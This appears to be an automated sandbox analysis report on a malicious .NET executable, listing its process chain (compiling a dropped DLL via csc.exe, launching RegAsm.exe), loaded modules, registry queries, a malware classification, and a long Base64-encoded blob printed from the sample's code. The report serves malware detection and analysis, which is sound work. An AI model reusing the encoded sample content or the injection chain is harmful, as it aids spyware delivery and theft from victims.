Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043CCB0	5_2_0043CCB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00434D40	5_2_00434D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00429C75	5_2_00429C75
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00407550	5_2_00407550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042AD52	5_2_0042AD52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0040F560	5_2_0040F560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0041D570	5_2_0041D570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00405530	5_2_00405530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00417DCE	5_2_00417DCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00423DD0	5_2_00423DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043E5E0	5_2_0043E5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004305E0	5_2_004305E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0040A5F0	5_2_0040A5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0040B660	5_2_0040B660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004426C8	5_2_004426C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00424ED7	5_2_00424ED7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004266F0	5_2_004266F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004366F7	5_2_004366F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0040DE80	5_2_0040DE80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043CF00	5_2_0043CF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043FFF0	5_2_0043FFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00407F80	5_2_00407F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00418782	5_2_00418782

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040CC90 appears 42 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00416FF0 appears 72 times

Source: TZ33WZy6QL.exe, 00000000.00000000.1348428511.00000000002EE000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameGlobally.exe: vs TZ33WZy6QL.exe
Source: TZ33WZy6QL.exe, 00000000.00000002.1382538159.000000000086E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs TZ33WZy6QL.exe
Source: TZ33WZy6QL.exe, 00000000.00000002.1383275515.00000000026E4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename1l2s0ln0.dll4 vs TZ33WZy6QL.exe
Source: TZ33WZy6QL.exe, 00000000.00000002.1383859211.00000000053B0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename1l2s0ln0.dll4 vs TZ33WZy6QL.exe
Source: TZ33WZy6QL.exe	Binary or memory string: OriginalFilenameGlobally.exe: vs TZ33WZy6QL.exe

Source: TZ33WZy6QL.exe, Iceberg.cs	Base64 encoded string: 'RjBVY2FBVVdNVThSRmxNWVBXODhGMFVMREZGVlZSdEZGbE1QVEhJY1p3VllEVVVXQzFVR1BXODhGMFVMREZGVlZSdEZGbE1QVEdRQWFCWmZEMU5NSzFnQll4QlpFbVVIRUVBY1pRZEZXVHRvYnp3RmN3QmFDMVZDQVZvVWRSRVdKMWdGQzFnUVl4QkZiendaYnp4VkprSVdRVVFIQlY4YWFFSjFEVmdVQjBRR2J3MVlMMU1XQ2xrUmRXODhRaFpDUWtZQVpBNWZBUllSRmxjQmJ3RVdLMWdXVXdCVlJRMVlGRk1RRm1JYVR3eENVd0JLQUU4Qll6bHJRa0FERGtNUUtrSmZERUpDRVVJVWRCWi9ERklIR2g5NERFSVdRaFlaYnp4VkprSVdRaFpDUWtRUWNoZEVEQllnQzBJMmFReEFCMFFXQjBSYlVnMS9ERUpUVkI0RFp3NURCeHBDRVVJVWRCWi9ERklIR2g5T0MyZ1dRaFpDSHp0L0MyZ1dRaFpDRWtNWGFndFZRa1VXQTBJY1pVSi9ERUpSVUJZMmFReEFCMFFXTmxrOGFCWUZVQjRBRzBJUVhUOFdGRmNPRjFOWkpndFlGaFlSRmxjSGNpdFlCbE1hU3p0L0prSVdRazF2YUJaVkprSVdRaFpDRUZNQmN4QllRblFMRm5VYWFCUlRFRUlIRUJnaGFTdFlGZ1ZRU2tBVWFoZFRUaFlSRmxjSGNpdFlCbE1hU3cxNERFSVdRaFlmYnp4NERFSVdRaFlTRjFRWmJ3RVdFVUlERmw4V0pnQlBGbE01UHhZMmFReEFCMFFXTmxrM2Z4WlRFUjRMREVKVmNBTmFGMU5MYnp4VkprSVdHVHRvUWhaVkprSVdRaFlRQjBJQWRBd1dJRjhXSVZrYmNBZEVGbE1RVEhFUWNpQlBGbE1SU2tBVWFoZFRTdzF2YUJaVkprSkxienhDUWhaVkpRZFlCa1FIQlY4YWFHODhienhDUWhaVkpSQlRCVjhOREJZMGRndDRBMXNIRVR0L0prSVdRa1lYQUZvY1pVSkZGbGNXQzFWVmRSWkVDMWdGT1d0VlFRZENJMFlMTEZjWVl4RWVTenRvUWhaVkpoazdhQlpDUWhaVkprSVdFRk1XRjBRYkpneFRGUllSRmtRY2FBVnRQenRvUWhaVkprSVdRaFlaYnp4VkprSVdRaFpDUWhaVkprSVVDVk1RREZNWk5WQVVUanRvUWhaVkprSVdRaFpDUWhaVkpBeENCbG9PUUJwNERFSVdRaFpDUWhaVkprSVdRaFF3QjBVQWF3ZGlDa1FIQTFKWEttODhRaFpDUWhaVkprSVdRaFpDUUdFYWNWUUNNVk1XTmw0SFl3TlNJVmtNRmxNTmNrQWFienhDUWhaVkprSVdRaFpDUWhaWFZRZENObDRRQjFjUlJRMVlGbE1hRmhSWkMyZ1dRaFpDUWhaVkprSVdRaFpBTlZrQ01GWnhCMEkyQ2tRUVp3WjFEVmdXQjA0QkpFNDdhQlpDUWhaVkprSVdRaFpDUWhReVl4WmlDa1FIQTFJMmFReENCMDRXUUJwNERFSVdRaFpDUWhaVkprSVdRaFEwQzBRQmN3TmFJMW9PRFZVd2ZrQWFienhDUWhaVkprSVdRaFpDUWhaWFVSQmZGbE15RUZrV1l4RkZMMU1QRFVRTUpFNDdhQlpDUWhaVkprSVdRaFpDUWhRbll3TlNNa1FOQVZNR2RTOVREMWtRR3hSWkMyZ1dRaFpDUWhaVkprSVdRaFpBT0VFZ2FBOVhFbUFMQjBFNllERlRBVUlMRFZoWEttODhRaFpDUWhaVkprSVdRaFpDUUhVSFl3TkNCMllRRFZVUWRSRjNRRHRvUWhaVkprSVdRaFlmV1R0L0prSVdRa3R2YUJaVkprSVZCMWdHRUZNU2J3MVlienh2YUJaVkprSVZFRk1GQzFrYkppTkdDM0lIRGxNU1p4WlRFVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbVFIRVVNWVl6WmVFRk1EQm5JUWFnZFJBMElIU244YmNqSkNFQllLQTFnUmFnY2ZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFl4QjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdNVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFlsQjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdKVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbUFMRUVJQVp3NTNEbG9OQVhNTlFnZGFCMUVERmxOZFR3eENNa0lRUWw0VWFBWmFCeHBDQzFnQkpnTlNCa1FIRVVWWkpndFlGaFlPQjFnU2Nnb2FRbDhNRmhZQmZ4SlRUaFlMREVKVmRoQlpGbE1CRmg5T0MyZ1dRaFpDRWtRY2NBTkNCeFlHQjFvUVlRTkNCeFlBRFZrWkpqVkVDMElITDFNWWFSQlBKbE1PQjFFVWNnY2VLMWdXTWtJSEp
Source: TZ33WZy6QL.exe, Tp.cs	Base64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@8/7@1/2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_004358F0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

5_2_004358F0

Source: C:\Users\user\Desktop\TZ33WZy6QL.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TZ33WZy6QL.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2492:120:WilError_03

Source: C:\Users\user\Desktop\TZ33WZy6QL.exe

File created: C:\Users\user\AppData\Local\Temp\1l2s0ln0

Jump to behavior

Source: TZ33WZy6QL.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: TZ33WZy6QL.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\TZ33WZy6QL.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: TZ33WZy6QL.exe

ReversingLabs: Detection: 52%

Source: unknown	Process created: C:\Users\user\Desktop\TZ33WZy6QL.exe "C:\Users\user\Desktop\TZ33WZy6QL.exe"
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A5B.tmp" "c:\Users\user\AppData\Local\Temp\1l2s0ln0\CSC85B0E78DF15C46CA993256ECF87E3F19.TMP"
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A5B.tmp" "c:\Users\user\AppData\Local\Temp\1l2s0ln0\CSC85B0E78DF15C46CA993256ECF87E3F19.TMP"	Jump to behavior

Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\TZ33WZy6QL.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: TZ33WZy6QL.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: TZ33WZy6QL.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: TZ33WZy6QL.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: q6C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.pdb source: TZ33WZy6QL.exe, 00000000.00000002.1383275515.00000000026E4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.pdbL source: TZ33WZy6QL.exe, 00000000.00000002.1382538159.000000000092B000.00000004.00000020.00020000.00000000.sdmp

Source: TZ33WZy6QL.exe

Static PE information: 0x939D3E11 [Tue Jun 23 20:09:53 2048 UTC]

Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.cmdline"
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.cmdline"			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004452F3 pushfd ; iretd		5_2_004452FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00448C84 push esi; iretd		5_2_00448C8D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

File created: C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.dll

Jump to dropped file

Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TZ33WZy6QL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
